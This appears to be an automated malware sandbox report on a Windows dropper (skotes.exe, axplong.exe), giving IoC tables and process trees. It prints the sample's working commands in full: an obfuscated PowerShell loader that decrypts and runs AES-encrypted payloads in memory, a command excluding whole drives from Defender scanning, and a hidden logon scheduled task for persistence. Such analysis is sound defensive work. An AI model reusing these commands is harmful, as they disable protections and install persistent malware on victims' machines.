Token: SeSystemEnvironmentPrivilege	3660	powershell.exe
Token: SeRemoteShutdownPrivilege	3660	powershell.exe
Token: SeUndockPrivilege	3660	powershell.exe
Token: SeManageVolumePrivilege	3660	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3556	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
3800	chrome.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
4784	msedge.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
4400	firefox.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe
2980	94bcd22a0e.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4400	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3556 wrote to memory of 4912	3556	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe	83
PID 3556 wrote to memory of 4912	3556	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe	83
PID 3556 wrote to memory of 4912	3556	5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe	83
PID 4912 wrote to memory of 3652	4912	skotes.exe	103
PID 4912 wrote to memory of 3652	4912	skotes.exe	103
PID 4912 wrote to memory of 3652	4912	skotes.exe	103
PID 3652 wrote to memory of 2052	3652	cmd.exe	105
PID 3652 wrote to memory of 2052	3652	cmd.exe	105
PID 3652 wrote to memory of 2052	3652	cmd.exe	105
PID 3652 wrote to memory of 5004	3652	cmd.exe	106
PID 3652 wrote to memory of 5004	3652	cmd.exe	106
PID 3652 wrote to memory of 5004	3652	cmd.exe	106
PID 5004 wrote to memory of 4056	5004	powershell.exe	107
PID 5004 wrote to memory of 4056	5004	powershell.exe	107
PID 5004 wrote to memory of 4056	5004	powershell.exe	107
PID 5004 wrote to memory of 2236	5004	powershell.exe	109
PID 5004 wrote to memory of 2236	5004	powershell.exe	109
PID 5004 wrote to memory of 2236	5004	powershell.exe	109
PID 4912 wrote to memory of 4080	4912	skotes.exe	111
PID 4912 wrote to memory of 4080	4912	skotes.exe	111
PID 4912 wrote to memory of 4080	4912	skotes.exe	111
PID 4080 wrote to memory of 3056	4080	rhnew.exe	112
PID 4080 wrote to memory of 3056	4080	rhnew.exe	112
PID 4080 wrote to memory of 3056	4080	rhnew.exe	112
PID 4080 wrote to memory of 3056	4080	rhnew.exe	112
PID 4080 wrote to memory of 3056	4080	rhnew.exe	112
PID 5004 wrote to memory of 3436	5004	powershell.exe	56
PID 5004 wrote to memory of 2360	5004	powershell.exe	42
PID 5004 wrote to memory of 960	5004	powershell.exe	12
PID 5004 wrote to memory of 1172	5004	powershell.exe	19
PID 5004 wrote to memory of 1364	5004	powershell.exe	22
PID 5004 wrote to memory of 1560	5004	powershell.exe	26
PID 5004 wrote to memory of 1756	5004	powershell.exe	31
PID 5004 wrote to memory of 1952	5004	powershell.exe	35
PID 5004 wrote to memory of 1748	5004	powershell.exe	30
PID 5004 wrote to memory of 1944	5004	powershell.exe	34
PID 5004 wrote to memory of 1072	5004	powershell.exe	17
PID 5004 wrote to memory of 2136	5004	powershell.exe	39
PID 5004 wrote to memory of 4896	5004	powershell.exe	65
PID 5004 wrote to memory of 2320	5004	powershell.exe	75
PID 5004 wrote to memory of 1916	5004	powershell.exe	113
PID 5004 wrote to memory of 1324	5004	powershell.exe	21
PID 5004 wrote to memory of 724	5004	powershell.exe	68
PID 5004 wrote to memory of 2612	5004	powershell.exe	117
PID 5004 wrote to memory of 2612	5004	powershell.exe	117
PID 5004 wrote to memory of 2612	5004	powershell.exe	117
PID 5004 wrote to memory of 2484	5004	powershell.exe	47
PID 5004 wrote to memory of 908	5004	powershell.exe	11
PID 5004 wrote to memory of 2088	5004	powershell.exe	38
PID 5004 wrote to memory of 2284	5004	powershell.exe	41
PID 5004 wrote to memory of 4844	5004	powershell.exe	69
PID 5004 wrote to memory of 3264	5004	powershell.exe	55
PID 5004 wrote to memory of 1880	5004	powershell.exe	33
PID 5004 wrote to memory of 2864	5004	powershell.exe	93
PID 5004 wrote to memory of 2464	5004	powershell.exe	46
PID 5004 wrote to memory of 1080	5004	powershell.exe	18
PID 5004 wrote to memory of 2180	5004	powershell.exe	40
PID 5004 wrote to memory of 1856	5004	powershell.exe	32
PID 5004 wrote to memory of 1060	5004	powershell.exe	16
PID 5004 wrote to memory of 2432	5004	powershell.exe	53
PID 5004 wrote to memory of 3012	5004	powershell.exe	51
PID 5004 wrote to memory of 2812	5004	powershell.exe	71
PID 5004 wrote to memory of 2368	5004	powershell.exe	43
PID 5004 wrote to memory of 2416	5004	powershell.exe	44

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:428

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1080

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1172
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  PID:3320
- C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
  C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2204
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1212

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1364

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1576
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2968
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\System32\svchost.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1584

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1952

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2136

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2180

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
PID:2416

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3264

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3436
- C:\Users\Admin\AppData\Local\Temp\5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe
  "C:\Users\Admin\AppData\Local\Temp\5aad15bf881eac2533ceb43ab4a3e65c90ab5cb42412677ad1f0f393a4d2efa7.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:3556
- - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
    "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4912
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3652
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\1011428021\withroot.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2052
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5004
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4056
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2236
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1011428021\withroot')
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2612
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3660
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:816
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network25450Man.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3156
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network25450Man.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        8⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:4056
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:1896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5632
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network25450Man')
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:2688
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\10002870122\UpdatedAdmin.cmd" "
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:5448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\10002870122\UpdatedAdmin.cmd';$nPrC='LoGoteadGote'.Replace('Gote', ''),'FITAkrITAkomBITAkaITAksITAke6ITAk4SITAktrITAkingITAk'.Replace('ITAk', ''),'EwCHintwCHirwCHiywCHiPwCHioiwCHintwCHi'.Replace('wCHi', ''),'SpePUtlitePUt'.Replace('ePUt', ''),'DecYisdompYisdrYisdeYisdsYisdsYisd'.Replace('Yisd', ''),'TsNkHrasNkHnssNkHfosNkHrsNkHmFsNkHinsNkHalsNkHBlosNkHcsNkHksNkH'.Replace('sNkH', ''),'CrfXbxeatfXbxeDfXbxecrfXbxypfXbxtfXbxorfXbx'.Replace('fXbx', ''),'MMLdxaMLdxinMLdxMoMLdxduMLdxleMLdx'.Replace('MLdx', ''),'ElIeKReIeKRmIeKReIeKRnIeKRtAIeKRtIeKR'.Replace('IeKR', ''),'InHUKcvHUKcokHUKceHUKc'.Replace('HUKc', ''),'ReazMwFdLzMwFizMwFneszMwF'.Replace('zMwF', ''),'ChaJonanaJongeEaJonxtaJonenaJonsaJoniaJonoaJonnaJon'.Replace('aJon', ''),'GepcketpckeCpckeurpckerepckentPpckerocpckeepckesspcke'.Replace('pcke', ''),'CQogZopQogZyTQogZoQogZ'.Replace('QogZ', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($nPrC[12])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function kMdJS($RQSTg){$zmvMN=[System.Security.Cryptography.Aes]::Create();$zmvMN.Mode=[System.Security.Cryptography.CipherMode]::CBC;$zmvMN.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$zmvMN.Key=[System.Convert]::($nPrC[1])('ML5/q9cXAh8zwmdF4WccY8ENAkFEsjrEy+dUpWTmk7k=');$zmvMN.IV=[System.Convert]::($nPrC[1])('zFU4xrxhUym0St+7yBu7eA==');$pWysh=$zmvMN.($nPrC[6])();$OefOm=$pWysh.($nPrC[5])($RQSTg,0,$RQSTg.Length);$pWysh.Dispose();$zmvMN.Dispose();$OefOm;}function PFVVL($RQSTg){$eAKke=New-Object System.IO.MemoryStream(,$RQSTg);$LAgIa=New-Object System.IO.MemoryStream;$nDRnz=New-Object System.IO.Compression.GZipStream($eAKke,[IO.Compression.CompressionMode]::($nPrC[4]));$nDRnz.($nPrC[13])($LAgIa);$nDRnz.Dispose();$eAKke.Dispose();$LAgIa.Dispose();$LAgIa.ToArray();}$LXMkx=[System.IO.File]::($nPrC[10])([Console]::Title);$NXZhU=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 5).Substring(2))));$MPjpB=PFVVL (kMdJS ([Convert]::($nPrC[1])([System.Linq.Enumerable]::($nPrC[8])($LXMkx, 6).Substring(2))));[System.Reflection.Assembly]::($nPrC[0])([byte[]]$MPjpB).($nPrC[2]).($nPrC[9])($null,$null);[System.Reflection.Assembly]::($nPrC[0])([byte[]]$NXZhU).($nPrC[2]).($nPrC[9])($null,$null); "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5180
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        11⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:5680
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
        11⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:1712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\10002870122\UpdatedAdmin')
